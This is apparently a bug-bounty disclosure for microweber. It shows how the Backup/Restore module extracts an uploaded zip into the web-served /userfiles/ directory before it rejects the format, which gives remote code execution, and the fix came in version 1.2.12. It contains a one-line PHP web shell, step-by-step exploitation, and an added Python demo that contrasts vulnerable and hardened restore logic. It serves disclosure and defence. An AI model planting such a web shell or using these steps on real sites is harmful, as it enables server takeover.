Abusing Backup/Restore feature to achieve Remote Code Execution in microweber/microweber

Valid

Reported on

Mar 9th 2022


Description

An administrator can use the Backup module to upload a zip archive that contains a PHP file. The archive is extracted into the web root before the restore is rejected as an unsupported format, so the PHP file ends up reachable by anyone, which leads to remote code execution (RCE).

Proof of Concept

  • Log in as admin and navigate to Modules -> Backup: https://demo.microweber.org/demo/admin/view:modules/load_module:admin__backup

(screenshot: Backup module)

  • Prepare a malicious PHP file, in this case info2.php, containing:

    <?php system($_GET['cm']); ?>

  • Compress this file to info2php.zip, then click Upload your backup.

(screenshot: upload of info2php.zip)

  • After the upload succeeds, click Restore, choose Try to overwrite content by Names & Titles, then Start Restore.

(screenshot: restore options)

  • The system returns "Import format not supported".

(screenshot: "Import format not supported" message)

  • However, the archive has already been unzipped before that check runs: info2.php is now located in /userfiles/, a directory served by the web server, so anyone can execute commands without authentication by requesting it with the cm parameter (for example /userfiles/info2.php?cm=id):

(screenshot: info2.php executing a command from /userfiles/)
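The steps above describe one bug class: an uploaded archive is unpacked into the web root first and its format is checked second, so the "not supported" answer is correct but arrives after the PHP file is already live. The following is an added Python illustration of that ordering beside a hardened version; it is not microweber's PHP code. The manifest name backup.json, the allowed-extension list and the userfiles directory handling are assumptions made for the example, and the archives it restores are constructed in the script.

```python
"""Extract-then-validate versus validate-then-extract for a backup archive.

Added example, not microweber's code. FORMAT_MARKER, ALLOWED_EXT and the
directory layout are assumptions for illustration only.
"""
import io
import os
import posixpath
import tempfile
import zipfile

FORMAT_MARKER = "backup.json"  # assumed: manifest a genuine backup must carry
# assumed allowlist of what a backup may legitimately contain; PHP is not on it
ALLOWED_EXT = {".json", ".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def build_zip(files):
    """Return zip bytes holding the given {name: content} entries (fixture builder)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def vulnerable_restore(zip_bytes, userfiles_dir):
    """Same order the report observed: unpack everything, then check the format.
    The rejection is honest but info2.php is already under userfiles/."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(userfiles_dir)
        if FORMAT_MARKER not in zf.namelist():
            return "Import format not supported"
    return "Restore complete"


def safe_restore(zip_bytes, userfiles_dir):
    """Refuse the whole archive before writing a single byte if the manifest is
    missing, an entry would escape the target directory, or any name carries a
    suffix outside the allowlist (every dot-suffix is checked, so a.php.jpg is
    rejected as well as a.php)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        if FORMAT_MARKER not in names:
            return "Import format not supported"
        for name in names:
            norm = posixpath.normpath(name)
            if posixpath.isabs(norm) or norm == ".." or norm.startswith("../"):
                return f"Rejected: path escapes target: {name!r}"
            if name.endswith("/"):  # directory entry, nothing to type-check
                continue
            suffixes = posixpath.basename(name).split(".")[1:]
            if not suffixes or any("." + s.lower() not in ALLOWED_EXT for s in suffixes):
                return f"Rejected: disallowed file type: {name!r}"
        zf.extractall(userfiles_dir)
    return "Restore complete"


def written_files(userfiles_dir):
    """Relative paths of every file now present under userfiles_dir."""
    found = set()
    for root, _dirs, files in os.walk(userfiles_dir):
        for f in files:
            found.add(os.path.relpath(os.path.join(root, f), userfiles_dir))
    return found


def demo():
    """Run both restore paths over constructed archives.
    Returns {case: (message, files left under userfiles/)}."""
    webshell = "<?php system($_GET['cm']); ?>"  # the report's info2.php
    cases = {
        # the report's info2php.zip: no manifest, just the web shell
        "vulnerable/webshell": (vulnerable_restore, build_zip({"info2.php": webshell})),
        "safe/webshell": (safe_restore, build_zip({"info2.php": webshell})),
        # manifest present, PHP file smuggled in beside real content
        "safe/manifest+webshell": (safe_restore,
                                   build_zip({"backup.json": "{}", "media/info2.php": webshell})),
        # a well-formed backup (constructed)
        "safe/clean": (safe_restore,
                       build_zip({"backup.json": "{}", "media/photo.jpg": "jpeg-bytes"})),
    }
    results = {}
    for label, (restore, archive) in cases.items():
        userfiles = tempfile.mkdtemp(prefix="userfiles_")
        results[label] = (restore(archive, userfiles), written_files(userfiles))
    return results


if __name__ == "__main__":
    for label, (msg, files) in demo().items():
        print(f"{label:24s} {msg!r:45s} left on disk: {sorted(files)}")
```

Run it and compare the first two cases: both answer "Import format not supported", but only the vulnerable path leaves info2.php on disk. The allowlist check on every dot-suffix rather than only the last one is deliberate, since some Apache AddHandler configurations execute a.php.jpg as PHP.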

Impact

Remote code execution (RCE) lets an attacker run code of their choosing on the server that hosts the site. Here the uploaded PHP file runs with the privileges of the web server process and is reachable by anyone, so the impact ranges from executing further malware to full control of the compromised host.

Timeline

  • huntr: We are processing your report and will contact the microweber team within 24 hours. (2 years ago)
  • Quan Doan modified the report (2 years ago)
  • Quan Doan modified the report (2 years ago)
  • Bozhidar Slaveykov validated this vulnerability (2 years ago)
  • Quan Doan has been awarded the disclosure bounty
  • The fix bounty is now up for grabs
Quan Doan (Researcher), 2 years ago:

Hi @bobimicroweber, since the report was validated, should I remove the malicious file on the demo server? Or will you reset the site later?

Thank you!

  • Bozhidar Slaveykov marked this as fixed in 1.2.12 with commit 867bdd (2 years ago)
  • Bozhidar Slaveykov has been awarded the fix bounty
  • This vulnerability will not receive a CVE